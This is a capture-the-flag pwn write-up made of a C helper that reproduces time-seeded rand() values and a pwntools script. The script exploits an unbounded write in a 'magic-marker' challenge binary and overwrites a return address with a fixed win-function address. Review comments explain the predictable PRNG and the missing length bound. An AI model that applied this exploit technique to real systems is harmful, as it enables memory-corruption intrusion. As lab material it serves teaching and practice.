Tags: write-what-where pwn pwnable
Rating: 1.5
timer.c
```C
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
/*
 * Helper used by the exploit script below: seed the C library PRNG with the
 * current wall-clock second and print the first two rand() % 40 values,
 * one per line.
 *
 * NOTE(review): the script reads these two numbers as if they match values
 * inside the challenge binary, so the target presumably also calls
 * srand(time(0)) -- confirm against the binary. A time-seeded rand() is
 * reproducible by anyone who runs the same code in the same second, so it
 * must not be used for values an attacker should not predict.
 */
int main() {
    /* Seed is the current time in seconds; nothing secret goes into it. */
    srand(time(0));

    /* Emit the first two draws, each reduced to the range 0..39. */
    for (int draw = 0; draw < 2; draw++) {
        printf("%d\n", rand() % 40);
    }

    return 0;
}
```
```python
from pwn import *
def pwn():
    """Replay the write-up's three-stage interaction against the challenge.

    Relies on two module-level pwntools tubes set up by the script entry
    point: ``h`` (the local ``./timer`` helper) and ``r`` (the challenge
    process or remote connection).

    Stages, following the original author's comments:
      1. repeat a write + ``w`` command once per unit of the first number,
      2. repeat a write + ``a`` command once more than the second number,
      3. perform a final write carrying a packed 64-bit address.

    NOTE(review): the stage payloads are longer than a plain text answer
    (28 or 8 filler bytes plus a packed integer), so the binary's
    ``write?`` input presumably lacks a length bound -- confirm against the
    binary. Bounding that read is the fix on the target side.
    """
    # The helper prints two integers, one per line (see timer.c).
    first = int(h.recvline().strip())
    second = int(h.recvline().strip())

    menu_prompt = b'up):'
    write_prompt = b'write?'

    def choose(key):
        # Wait for the menu prompt, then send a single menu choice.
        r.recvuntil(menu_prompt)
        r.sendline(key)

    def write_then_move(payload, direction):
        # One round: pick 'x', answer the write prompt, then send the move key.
        choose(b'x')
        r.sendafter(write_prompt, payload)
        choose(direction)

    r.sendline(b'jump up and down')

    # Stage 1 (author: "decrease first random number to zero").
    # 28 filler bytes followed by the 32-bit value 8; the meaning of 8 is
    # not visible here -- presumably a field stored right after a 28-byte
    # buffer. TODO confirm.
    stage_one = b'A'*28 + p32(8)
    for _ in range(first):
        write_then_move(stage_one, b'w')

    # Stage 2 (author: "decrease second random number to -1"), hence the
    # extra iteration. Same layout, with the 32-bit value 1.
    stage_two = b'A'*28 + p32(1)
    for _ in range(second + 1):
        write_then_move(stage_two, b'a')

    # Stage 3 (author: "write win function address to return address").
    # 0x400fa0 is a fixed address, which only holds if the binary is not
    # position-independent -- TODO confirm.
    choose(b'x')
    r.sendlineafter(write_prompt, b'A' * 8 + p64(0x400fa0))

    # recvall() reads until the tube reaches EOF before the result is printed.
    print(r.recvall())
    r.interactive()
if __name__ == '__main__':
    # Local helper that prints the two time-seeded rand() values; pwn()
    # reads them from this tube.
    h = process('./timer')

    # With no arguments, run the challenge binary locally and print its PID;
    # otherwise connect to the host and port given on the command line.
    # NOTE(review): sys is not imported explicitly; presumably it comes in
    # through `from pwn import *`.
    if len(sys.argv) <= 1:
        r = process(['./magic-marker'])
        print(util.proc.pidof(r))
    else:
        host = sys.argv[1]
        port = int(sys.argv[2])
        r = remote(host, port)

    pwn()
```